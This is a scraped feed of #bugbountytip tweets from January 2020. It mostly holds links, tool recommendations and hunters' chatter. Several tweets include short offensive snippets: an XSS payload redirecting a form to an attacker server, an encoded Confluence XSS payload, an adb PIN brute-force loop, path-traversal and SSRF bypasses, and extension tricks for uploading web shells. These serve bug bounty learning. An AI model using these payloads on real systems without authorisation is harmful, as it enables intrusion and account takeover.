1 Bug Bounty Life Cycle ๐Ÿค–๐Ÿค– Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/WQOAxWKgfW
Yadhavi
@PrincessYadhavi


2020-01-31 10:08:03
0 Do you know any labs (free or paid ) to practice new CVEs online? Except @PentesterLab and pentesteracademy #bugbountytips #bugbounty #bugbountytip
Zerorose Inc.
@zeroroseinc


2020-01-31 06:53:03
0 Ethiopian governments shadowy #bugbounty initiative to reward for bugs and exploits in popular software. I believe first of it's kind for this kind of talent recruitment in Africa. Impressive! https://t.co/Hixyo8AoXS #bugbountytips #bugbountytip
m0z
@LooseSecurity


2020-01-31 00:24:24
4 Install Python. Open yourself up to a word of open-source bug bounty tools. Don't put it off, because it will enrich your skills. #BugBounty #bugbountytips #BugBountyTip #infosec #infosecurity
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-01-30 23:24:58
2 HTTP Request Smuggling -Socket Poisoning https://t.co/F8AECN2aaq #bugbountytips #BugBountyTip #bugbounty #http #infosec #cybersecurity https://t.co/f3cdoy3tIH
Donato Scaramuzzo
@ramirezVII


2020-01-30 19:30:50
0 Button disabled? Inspect Element -> change from "disabled" to "enabeld" -> Button enabeld and action performed #BugBountyTip ๐Ÿ’ช๐Ÿป๐Ÿ˜†
Rushiikesh ๐Ÿ‡ฎ๐Ÿ‡ณ
@u1tran00b


2020-01-30 17:56:43
0 An Interesting Account Takeover: ๐Ÿ˜ƒ #infosec #bugbountytips #BugBountyTip #hackerone #bugcrowd Credits: @fatratfatrat โค๏ธ๐Ÿ’ฅ๐Ÿค˜ https://t.co/fPCoT5hV5W
AEMSecurity
@AEMSecurity


2020-01-30 16:29:18
1 [+] #BugbountyTip: When testing for anonymous write access on Adobe AEM in "/content/usergenerated/*" If you get HTTP 404, try bypassing the dispatcher filter rules like this: "/ANYEXISTINGFOLDER/..../content/usergenerated/test" #Bugbounty #TogetherWeHitHarder #AdobeAEM
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-30 16:25:24
1 Cyber Security ๐Ÿคช๐Ÿค–๐Ÿค–๐Ÿค–๐Ÿค– Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/Wsmd27pcML
fuzzsqlbOf
@fuzzsqlbof


2020-01-30 15:47:29
5 read my detailed writeup on HTTP Request Smuggling which i found in pvt program https://t.co/rUevK40Ip9 #bugbountytips #togetherwehitharder #bugbounty @albinowax #hackerone #bugbountytip
Your Next Bug Tip
@YourNextBug


2020-01-30 15:31:14
0 Thanks @traceableai for providing API testing resources(tips) There aren't many info about API testing but your tups and this blog post is awesome to learn API Testing #bugbountytips #bugbountytip #bugbounty https://t.co/6gI1kS7I7A
Zerorose Inc.
@zeroroseinc


2020-01-30 14:32:55
1 Accellion SSRF to LFD by exploiting a weak regex /$http://site.com/i -- without the ^ in the front so bypassing with file:///file#http://site.com by @PaulosYibelo https://t.co/I1iJ2ZnfqH #bugbountytips #bugbounty #bugbountytip
The Bug Bounty Podcast
@bounty_podcast


2020-01-30 13:17:17
3 Episode #2 - We sit down with @0xacb to talk about how to be successful in bug bounty, live events, music and creativity and of course, how to reach cosmic brain level 10. Listen on https://t.co/eY3KgecFBv #bountylife #bugbounty #bugbountypodcast #bugbountytip #bbp
INTIGRITI
@intigriti


2020-01-30 13:06:53
49 Some #bugbounty hunters made over โ‚ฌ50.000 in bug bounties with this simple trick. ๐Ÿค‘ Thanks for the #BugBountyTip, @rez0__! https://t.co/z9sPFJTNqV
Black Turtle
@thebl4ckturtle


2020-01-30 10:30:20
0 A simple tool to detect wildcards domain based on Amass's wildcards detector. https://t.co/SrZP1KwNqh P/s: @jeff_foley Thanks for created an awesome tool! #bugbounty #golang #bugbountytip #bugbountytips
Andy Garcia
@GaelleTjat


2020-01-30 06:45:34
0 A Webshell story https://t.co/pOHt81i6dZ #bugbountytip @Hacker0x01 @Jhaddix #infosec
Robr
@sweepthatleg


2020-01-30 00:21:43
0 Always a fan of @LittleJoeTables creations. This time โšก fast screen shots in a convenient desktop app #bugbounty #bugbountytip #infosec #electron #javascript https://t.co/k9ae1Yk8Zq
z3rb0a
@OwlCyberGhost1


2020-01-30 00:14:41
0 My first race condition . They not view it as serious security risk. But rewarded me for appreciation #bugbounty #bugbountytip #hackerone #TogetherWeHitHarder https://t.co/UeArHgwfWr
Andri Wahyudi ๐Ÿ•Š๏ธ
@andripwn


2020-01-29 20:30:25
1 Wordpress: Multiple Vulnerabilities in Simple Login Log Plugin https://t.co/gZdRnaJYdY #bugbountytip #bugbountytips #wordpress #vulnerability
Samet SAHIN
@sametsahinnet


2020-01-29 19:28:57
2 If you have a XSS in a <form> tag, close it and open a new form that you are controlling. Payload : "></form><form action="http://yourserver/> This is just a short payload for increasing the severity. #bugbountytip #bugbountytips https://t.co/140rJjo5Nt
Abhijeet Singh
@abhiunix


2020-01-29 16:15:03
0 My first bounty, after 25+ dups and 2 N/As. Got Hall of Fame in few programs but never get paid. Thanks to all members of bug bounty community. @Hacker0x01 A special Thanks to @OffensiveHunter Sir & @abhinavbom Sir for the guidance. #bugbounty #bugbountytip #TogetherWeHitHarder https://t.co/kKQQZ84Bba
Lรผtfรผ Mert Ceylan
@lutfumertceylan


2020-01-29 12:04:44
0 An exploit, 240+ affected site (Reflected XSS) @openbugbounty #BugBounty #bugbountytip https://t.co/Rp6SFcEOVY
Ujwal Kumar
@Ujwal07kumar


2020-01-29 08:01:22
1 https://t.co/mzK8B5B2zR Have written a blog on Bug bounty with Google recon. Contains list of dorks to check for juicy contents. Recommended to developers and security folks. #security #dataprivacy #bugbounty #bugbountytip Any suggestions are welcome. :)
Harsh Jaiswal
@rootxharsh


2020-01-29 02:45:10
1 One more: Find a subdomain such as <grafana>.corp.company.com which points to a external IP example however only accessible inside VPN and such SSRF could be leveraged in that way. You can often find such hosts over SSL. Have exploited such in pasts. Might even be a #bugbountytip https://t.co/lusB0fAEnU https://t.co/BVA99w6ios
Zerorose Inc.
@zeroroseinc


2020-01-28 22:15:59
2 Yahoo homepage strightfwd XSS by @PaulosYibelo from end of 2019. https://t.co/Il48kikn29 #bugbounty #bugbountytip
d4d
@d4d89704243


2020-01-28 20:36:48
0 I was able to successfully exploit the vulnerabilities in PHP parse_url from @orange_8361 article of 2017 https://t.co/jCdIuhFtz0 and found new way to exploit curl uri parser #bugbountytip
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-01-28 18:54:08
5 #OSINT DomainTools:https://t.co/zFCGR0Un8G Active Whois:https://t.co/KtnxHQevyp Domain Dossier:https://t.co/hjdz9aNJuW Network Solutions:https://t.co/rZhFIOmJVZ DNSstuff:https://t.co/C5T85kfbOB DNS-Digger:https://t.co/FWwXrCvNdm Shodan:https://t.co/U8xoj0R4dN #bugbountytip
Aish Kendle
@aish_kendle


2020-01-28 18:24:49
0 Got my first Subdomain Takeover! #ReconWins #bugbountytips #bugbounty #s3 #aws #azure #bounty #bug #bughunting #infosec #reward #bugbountytip #first #recon #cybersecurity #infosec #cyberattack #hacking https://t.co/07eVXqCIWS
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-28 10:24:17
1 Hackers Say Yo ! ๐Ÿค–๐Ÿค– Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/vheJORritR
Abhishek ๐Ÿ•ต๏ธ
@abhishake100


2020-01-28 09:49:36
0 I just published "Hyperlink Injection - Easy Money (sometimes)" #bugbounty #bug #bounty #bugbountytip https://t.co/zLbLOZraqX
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-28 09:23:49
2 Online Privacy is a MYTH ! ๐Ÿค–๐Ÿค–๐Ÿค– Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/pFsxZWkByp
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-28 09:20:31
4 Life of Cyber Security Professionals ๐Ÿค–๐Ÿค–๐Ÿค– Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/5mjA2uBFTJ
x1m
@x1m_martijn


2020-01-28 09:08:24
0 Clean desk, clean mind ๐Ÿ˜Œโ˜บ๏ธ #infosec #bugbountytip https://t.co/Q8YxsF6cr6
Th3Alch3mist~
@Debian_Hunter


2020-01-28 07:32:17
0 Sweet as candy ๐Ÿฌ nice tip #bugbountytip #infosec https://t.co/uWJAWNJpv9
Hx01
@Hxzeroone


2020-01-28 06:47:12
0 @Kr0t3 Iโ€™d suggest creating a twitter bot which fetches tips with hashtags like #bugbountytip
Mashoud1122
@mashoud1122


2020-01-27 18:01:55
2 There are some endpoints show JSON, but forget to set the header to โ€œContent-type: application/jsonโ€ and leave it as โ€œContent-type: text/htmlโ€ , and they show special chars , easy XSS ;) #bugbountytip #bugbountytips #BugBounty
o k t a v a n d i
@0ktavandi


2020-01-27 11:49:23
0 Never trust a public cheatsheet , cheatsheet is just a reference for purpose development , make your own cheatsheet #protip #bugbountytips #bugbountytip
bug bounty tips - Retweet
@YourNextBug


2020-01-27 10:20:59
2 Send Any Message From Snapchat to anyone. Snapchat Hacked By: Mohammad Khizer Javed https://t.co/LnkvBjqndu #bugbountytips #bugbountytip #bugbounty
M. Khizer Javed
@KHIZER_JAVED47


2020-01-27 08:57:21
0 Instant Admin Access!! #Takeaways always check JS files and request responses. This tool by @jobertabma is pretty good in looking for endpoints https://t.co/1iTFImCerY #BugBounty #bugbountytips #bugbountytip
Tomi
@noobe_io


2020-01-27 06:33:24
0 Start this week with Authentication Bypass XD #BugBounty #bugcrowd #bugbountytip https://t.co/kh7QfZoECi
Himanshu Giri
@Himanshuraj17Hr


2020-01-27 06:18:18
2 If there is no rate limit on PIN functionality of Android APK ,but the app is protected by every mechanism, then try to brute Force using adb . for i in {0000..9999}; do adb shell input text $i ; done #BugBounty #BugBountyTip #bugbounties #bugbountytips #600$
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-27 04:35:18
0 #RDP #HACKING Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/FoMZwetU8T
human
@t0ddpar0dy


2020-01-26 23:13:03
0 Show. Me. Your. Vuln Face! You knowโ€”the face you make when youโ€™ve found the unthinkable.. #BugBountyTip #BugBounty #hackers
m0z
@LooseSecurity


2020-01-26 18:57:33
0 For enumerating subdomains I always use @zer0pwn's Spyse API wrapper. It's so f'in good! https://t.co/zBAsuiKw7c #bugbountytips #bugbountytip #bugbounties #bugbounty #infosec
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-26 17:22:52
3 #redteam Security Assessments Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone #follow https://t.co/CGKg7E7EiX
Maximiliano Soler
@MaxiSoler


2020-01-25 22:48:09
1 It has been a blast! Seeing the local community sharing and helping each others. Kudos @ylevalle @soyelmago and @Hacker0x01 Crew @Arl_rose & @sgtcardigan ๐Ÿ‡ฆ๐Ÿ‡ท #BugBountyTip #togetherwehitharder ๐Ÿ’ช๐Ÿพ https://t.co/xj6RDkiLiL
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2020-01-25 22:41:08
8 -PENTESTING-BIBLE: https://t.co/q2layzVpKz -OSINT_TIPS: https://t.co/gNMSDGULS6 #BugBountyTip #Hacking #pentest #OSINT #redteam #Malware #CyberSecurity #Linux #html5 #computerscience #infosec #Python
Junaid Khan
@akajunoon


2020-01-25 18:59:05
0 Last Two Months was so surprising for me ... Demanded infinite help from other to learn Bug Hunting but sadly one thing i learned ... They will help you until and unless you have something giving them back . #bugbountytips #hackerone #BugBountyTip #hackers
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-25 17:41:59
0 Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/FmFBqH5ihS
noobSecurity
@noobsec_org


2020-01-25 16:07:26
2 Always view the page source code, sometime u get some GOLD like mdfk this๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ P1 just in 5 minutes #bugbountytips #bugbountytip #OuthackThemAll #ItTakesACrowd #togetherwehitharder https://t.co/eFXvbt5abw
Katie Paxton-Fear
@InsiderPhD


2020-01-25 16:00:01
11 ๐ŸšจNew video! This week we talk about CSRF bugs, definitely one of the more technical beginner bugs, but actually not that difficult once you get your head around them. Case studies as usual but also some PoC code + a demo #BugBounty #bugbountytip https://t.co/zUxcUwLts9 https://t.co/Ia75ItLYDj
Sayaan Alam
@ehsayaan


2020-01-25 13:16:05
1 Just did a write-up on my recent finding. #bugbountytip #writeup #bugbounty โ€œAccidental IDOR that Deleted Admin Account.โ€ by Sayaan Alam https://t.co/LURpTYicyi
Imran Parray
@CreedHackers


2020-01-25 12:50:53
2 #bugbountytip Mastering a single bug class is better than being noob at everything. #bugbounty #infosec
Hussein Daher
@HusseiN98D


2020-01-25 12:28:21
2 #BugBountyTip time: combine Arjun from @s0md3v with BurpIntuder to bruteforce parameter values. I once got "?debug" as a valid parameter and got "on" as a good value which disclosed juicy information helping me chain bugs to a P1. Final: "?debug=on" #bugbountytips #pentest RT & L
Leonishan
@leonishan_


2020-01-25 11:12:49
3 Detecting valid tags/events on XSS exploitation. A script to find suitable XSS payloads after analyzing how tags/events are filtered. https://t.co/u6WxTL5gBe https://t.co/n9zMuRW8gX #XSS #bugbountytip #bugbounty
Th3Alch3mist~
@Debian_Hunter


2020-01-25 10:28:39
0 I Found this tool while recon and let me tell you something "IT'S AWESOME!! " xd check this out it collects many information automatically using different tools so you must run it if you are starting a new program #bugbountytip #bugbounty #bugbountytool https://t.co/M2FUBHycMM
Sayaan Alam
@ehsayaan


2020-01-25 09:00:00
0 Good Opportunity to protect your country.. #bugbountytip https://t.co/xcTrdnlM7r
reconness
@reconness


2020-01-25 00:57:13
0 Remember you can join us in our Discord Server https://t.co/LIWdtvdJmT #bugbountytip #Pentesting #recon
M. Khizer Javed
@KHIZER_JAVED47


2020-01-24 18:12:20
1 #BugBountyTip While looking in github for information desc do check commit history sometimes they remove the tokens but don't change or revoke them ;) https://t.co/r05vUKKkuX
bug bounty tips - Retweet
@YourNextBug


2020-01-24 16:34:38
0 Read Any File using .odc file Hacked By @pnig0s Read Here https://t.co/lpqCZYApLX #bugbountytips #bugbountytip
thehackerish
@thehackerish


2020-01-24 07:13:36
0 I remember when I saw Sqlmap the first time mentioned in @rootme_org, I was exploiting #SQL injections manually or via Python scripts, then fell in love with how effective Sqlmap was. #BugBountyTip: It is a must have tool to master, follow @sqlmap for advanced usage.
bug bounty tips - Retweet
@YourNextBug


2020-01-24 02:31:48
1 Found a b-sqli Status-same Cont. Length - Same Visible Content Same Looking at source code found that right query adds a <div></div> false query remove the <div></div> But No change in content length, probably it was adding something else. #bugbountytips #bugbountytip
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-01-23 22:46:52
2 1) skf-labs :> Repo for all the OWASP-SKF Docker lab examples https://t.co/7cIL06hS9Y #) KernelMalware https://t.co/1HrR6S7LWx #bugbounty #bugbountytips #BugBountyTip #kernel #malware
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-01-23 22:43:50
0 1) New Muhstik Botnet Attacks Target Tomato Routers https://t.co/AHgAbfr8CE 2) AlertResponder - Automatic Security Alert Response Framework By AWS Serverless Application Model https://t.co/aVNdKucwHG #bugbounty #bugbountytips #BugBountyTip
Virus
@Virus0X01


2020-01-23 21:16:15
0 read my write up about CORS i found in a private program #bugbounty #BugBountyTip https://t.co/tLvlcrf7SO
0xNoah
@ncnx700


2020-01-23 20:46:49
1 I want to get my blog set up. I'm interested in what people think the best platform or method of going about it is. I'm willing to manually set up and configure one if I choose to host it myself. Please retweet for visibility! #infosec #CyberSecurity #OSINT #H1 #BugBountyTip
terjanq
@terjanq


2020-01-23 16:31:52
5 I started writing solutions to my challenges on #justctf quite a time ago but haven't had enough time to finish it. I decided to publish these very chaotic writeups to Dominoes, Scam Generator and p&q service. #xssearch #bugbountytip https://t.co/eImStmRiuT
Damian Schwyrz
@damian_89_


2020-01-23 15:39:16
0 Nice, found an older adminer version on a host which allows using "Elasticsearch (beta)" as a source and it turns out, we can abuse this. At least blind ssrf ;) #bugbountytip https://t.co/rj59BI1SHv
Hendrik
@hendrikvb


2020-01-23 14:14:50
0 Asking for a friend: #ethicalhacking means you *should not* abuse a sequential recipient ID in a spam newsletter โ€œView Onlineโ€ link and click unsubscribe for all victims.. right? #BugBountyTip #spam
Eduard Tolosa
@Edu4rdSHL


2020-01-23 12:30:17
5 Bash function to check domain wilcards. Add it to your .bashrc and use it with: check_wilcard domain.example #bugbounty #bugbountytips #bugbountytip #bash #linux https://t.co/Sa1z4u8Lfy
Jenish
@_jensec


2020-01-23 08:24:43
13 2nd critical of this week. #BugBountyTip Abuse ouath Sign-up flow: 1) Use phone number instead email in 3rd party to sign-up. 2) Link victim's email to your 3rd party account while singnup on target. 3) Login to vicitim's account using your 3rd party account. https://t.co/4yrK5KXa4v
SPAWN POINT GAMING
@gametestingsp


2020-01-23 06:58:07
0 A #game plagued by #Bugs/#Glitches is the worst nightmare for #GameDevelopers! So what are bugs and their types in a game? Click here to read this #BLOG ๐Ÿ‘‰๐ŸŽฎ https://t.co/y5BiX492wh #Gamedev #BugBountyTip #Indiedev #MobileGame #Androidgames #readers #article #gamingblog #unity
GokhanGK
@gkhck_


2020-01-23 06:55:02
1 Atlassian Confluence 3.4.x - Error Page Cross-Site Scripting Payload : %3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E.vm CVE-2018-5230 https://t.co/Ulv9nwcnQv #bugbountytip #bugbountytips https://t.co/nXx2Xiu4jQ
Jerry @unitedconindia
@lordjerry0x01


2020-01-23 05:12:08
0 You may find this useful ๐Ÿ˜‰ #BugBountyTip #bugbounty #hacking https://t.co/wWk7EwV7zS
Nassec.io
@nassecio


2020-01-23 03:30:51
8 @evilboyajay comes up with another #bugbountywriteup on this week's blog - this time about Host-Header Injection. #informationsecurity #cybersecurity #bugbounty #infosecmatters #writeups #hostheaderinjection #bugbountytip https://t.co/E7hXZo0XaV
Th3Alch3mist~
@Debian_Hunter


2020-01-23 03:11:35
0 Check this out it's cool #bugbountytips #bugbounty #BugBountyTip https://t.co/49rkPVwoDQ
Hussein Daher
@HusseiN98D


2020-01-22 23:06:21
18 #BugBountyTip time: I've got a RCE by using this tip: while testing for malicious file uploads, if .php extension is blacklisted you can try .PhP , .php5 and .php3 Sometime this fools the backend and you get shell! RTs & comments are appreciated. Follow #bugbountytips #pentest
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-01-22 22:01:22
1 Bugbounty Checklist By Sehno https://t.co/wshOrucUjT #bugbounty #BugBountyTip #bugbounty2020goals #bigbountytips #infosec #security #nullcrowd https://t.co/0FoTN4pcEf
bug bounty tips - Retweet
@YourNextBug


2020-01-22 18:02:41
2 One can drive a bike at 80km/hr and someone can drive the same bike at 120 km/hr. Its matter of knowing the tool and practicing it. BLOG ON SHODAN Using Shodan Better Way by @0xrudrapratap https://t.co/HUrxeMQM94 #bugbountytips #bugbountytip
Rafin Rahman Chy
@rafinrahmanchy


2020-01-22 17:56:27
0 Guides for Business Logic Flaw https://t.co/chT0dwJAee https://t.co/RnwFmNfdwj https://t.co/t9aNa8GVOe #BugBounty #bugbountytip #bugbountytips #websecurity #appsec #netsec #pentesting #pentest #EthicalHacking #EthicalHacker #Hacking #Hacker #InfoSec #InfoSecurity #CyberSecurity
bugbountymemes
@bugbounty_memes


2020-01-22 16:27:28
0 #bugbountytip when report closed as duplicate ๐Ÿ˜€๐Ÿ˜€ https://t.co/p7IrtWLPED
Cryptographer
@crypt0gr4ph3r


2020-01-22 16:24:27
3 Awarded $100 bounty on @Hacker0x01 in less than 1 minute 1. Reported bug and got duplicate :( 2. Added in original report 3. Waited for fixed. Before :- x(.)com/abc/payload 3. Bypassed fix :- Just changed to :- x(.)com/abC/payload #bugbounty #bugbountytip #hackerone
bug bounty tips - Retweet
@YourNextBug


2020-01-22 15:19:25
2 Just Like Second order sqli and xss, Here is Second order IDOR. MUST CHECK OUT #bugbountytips #bugbountytip #bugbounty https://t.co/wWdvIjNBOt
Eduard Tolosa
@Edu4rdSHL


2020-01-22 14:29:12
1 Second part of โ€œSubdomains Enumeration: what is, how to do it, monitoring automation using webhooks and centralizing your findings" is coming soon. Follow me to be aware. First part quoted. #BugBounty #bugbountytip #recon #hacking #osint #findomain #bugbountytips #webhooks https://t.co/SHKFdYiq2K
Ankit(Rudra16)
@rudra16t


2020-01-22 12:20:55
2 Watch our expert @fransrosen keynote from @bsidesahmedabad ๐Ÿ˜๐Ÿ˜ #infosec #bugbounty #BugBountyTip https://t.co/KL8BybPIaV
BSides Ahmedabad
@bsidesahmedabad


2020-01-22 12:17:04
8 Watch @fransrosen Keynote at #bsidesahmedabad2019 https://t.co/hcJkB3r3po #BugBountyTip #bugbounty #KeynoteSpeaker #infosec #Pentesting #hacking #Hacked
Ismayil Tahmazov
@Tismayil1


2020-01-22 11:30:41
2 @AsrcSecurity thanks for gifts. #bugbounty #bugbountytips #BugBountyTip #bugbounty2020goals https://t.co/0jn1CUTjEH
Yadhavi
@PrincessYadhavi


2020-01-22 08:35:53
0 anyone know golang version of whatweb tool? #bugbounty #bugbountytip #bugbountytips
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-22 08:28:47
3 Connected Cars #hacking ๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡ Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/hE4MdPWXNu
Hussein Daher
@HusseiN98D


2020-01-21 22:34:45
17 #BugBountyTip time: when you see a POST request made with JSON, convert this to XML and test for XXE. You can use "Content-type converter" extension on @Burp_Suite to do achieve this! #bugbountytips #infosec #hacking #pentest #pentesting #bugbounty RT and Follow, book coming!
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-01-21 21:32:55
0 Awesome GitHub Repos 9. Awesome Web Security = https://t.co/JYwoh7QCdy 10. Penetration Test Guide based on OWASP = https://t.co/6YKTRRvvTZ 11. Pentest Compilation = https://t.co/fbpKJXGnWI 12. Infosec Reference = https://t.co/KSGiX8Vv1D #bugbountytips #bugbountytip #hacking https://t.co/j75f0AfTpa
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-01-21 21:32:15
0 Awesome GitHub Repos 5. Awesome Web Hacking = https://t.co/tS4wYzEZ4v 6. Awesome Hacking Resources = https://t.co/i6d4C1OIzN 7. Awesome Pentest = https://t.co/eZ5mDtUi3a 8. Awesome Red Teaming = https://t.co/zu17ZEK16J #bugbountytips #bugbountytip https://t.co/FfNJ4D2imR
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-01-21 21:31:30
0 Awesome GitHub Repos 1. Book of Secret Knowledge = https://t.co/kLqcHAo7gV 2. Awesome Hacking = https://t.co/vRBXZkxI29 3. Awesome Bug Bounty = https://t.co/lMh6dqBGN1 4. Awesome Penetration Testing = https://t.co/9cDaJLVKGm #bugbountytips #bugbountytip #hacking https://t.co/yCTNbsHWcr
Kenan
@kenanistaken


2020-01-21 20:39:11
1 newbies ask,where to start,what to learn. start at home,start at work,start whereever you want,just start. learn whatever you want. no need to ask these questions anymore anybody. I'm here because I am experienced computers since 90s. you still ask where to start ๐Ÿ˜‚ #bugbountytip
bug bounty tips - Retweet
@YourNextBug


2020-01-21 18:12:29
0 What was your worst bug bounty mistake? #bugbounty #bugbountytips #bugbountytip
healthyoutlet
@healthyoutlet


2020-01-21 17:06:44
0 When devs are nice enough to leave an accessible sourcemap, use this tool to download everything so you don't have to analyze the code in your browsers debugger: https://t.co/bS6dJmXkOY #bugbountytip
bug bounty tips - Retweet
@YourNextBug


2020-01-21 16:47:15
0 What was your worst bug bounty mistake? My was reporting Sql databse username and password leak to a out of scope domain, report got not valid and -ve points, although they fixed that. -_- #bugbounty #bugbountytips #bugbountytip
Eduard Tolosa
@Edu4rdSHL


2020-01-21 14:25:59
2 `sudo -l` gives you a list of allowed and forbidden commands for the current user. It's useful because sometimes people allow certain (dangerous) commands without using password, so you can do a local privilege escalation. #linux #bugbountytip #BugBounty
OWASP Web Security Testing Guide
@owasp_wstg


2020-01-21 11:46:01
0 Without a strong lockout mechanism, the application may be susceptible to brute force attacks. ๐Ÿคœ๐Ÿšช Use combinations of incorrect password attempts and correct login credentials to test lockout mechanism rules. #cybersecurity #bugbountytip #appsec https://t.co/lWVLEqWX0Z
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@y0dhha


2020-01-21 10:54:00
0 - Hey folks <3 Here is a "OSINT , Capture the flag" challenge :) This is a mixture of OSINT & steganography challenge โ™ฅ๏ธ Attachment: https://t.co/61DLQoCROi Password - nullcrowd #ctf #ctfchallenge #bugbountytips #bugbountytip #bugbounty2020goals https://t.co/0EAqyPy3Ln
thehackerish
@thehackerish


2020-01-21 09:59:30
0 When looking on known exploits for a target, Twitter can help you: search "target #bugbountytip". The #BugBounty community can surprise you sometimes with cool tricks!
ฮทฮฑeโท
@chocolatey_tae


2020-01-21 09:28:31
2 Hey guys , Every Hacker should join this platform ASAP it's damn cool . https://t.co/kH0TUTWYJW #hacker #BugBounty #bugbountytip
Cipher_942
@Ciper_942


2020-01-21 09:26:52
0 Hey guys , Every Hacker should join this platform ASAP it's damn cool . https://t.co/xZYf0qZTkd #hacker #BugBounty #bugbountytip
niravsikotaria
@niravsikotaria


2020-01-21 03:09:04
5 Challenge Link: https://t.co/8y1ld1iXkq Parameter: ruid Bug Type: Expression Language Injection Send POC in PM. @gabsmashh @stokfredrik #hacking #pentesting #infosec #bug #bugbounty #hackerone #bugbountytip #bugbountytips
Aashish Yadav
@aa5h15h


2020-01-20 20:21:18
4 First Steps in Hyper-V Research https://t.co/oM3FgO4A2e #research #infosec #cybersecurity #pentest #redteam #exploit #hackerone #hyperv #bugbounty #malware #virtualization #oracle #virtualbox #bugbountytip #windows #linux #unix #dev #bugcrowd #RETWEEET #programming https://t.co/vOEH9qiR6E
Hussein Daher
@HusseiN98D


2020-01-20 20:07:28
16 Time for a new #bugbounty tip! When I sign up to a website/newsletter/reset password, I look at the website which hosts the logo/image in the email I receive. This led me multiple time to insecure AWS S3 buckets and scope expansion. #bugbountytip #bugbountytips #infosec #hacking
bug bounty tips - Retweet
@BugbountytipsR


2020-01-20 16:32:50
0 I have been reading diff API testing related article but didn't find any direct/satisfied article that can dive me in deep. It will be really gr8 if you guys can share some article/presentation/video or your own tip :) #bugbountytips #bugbountytip (1/2)
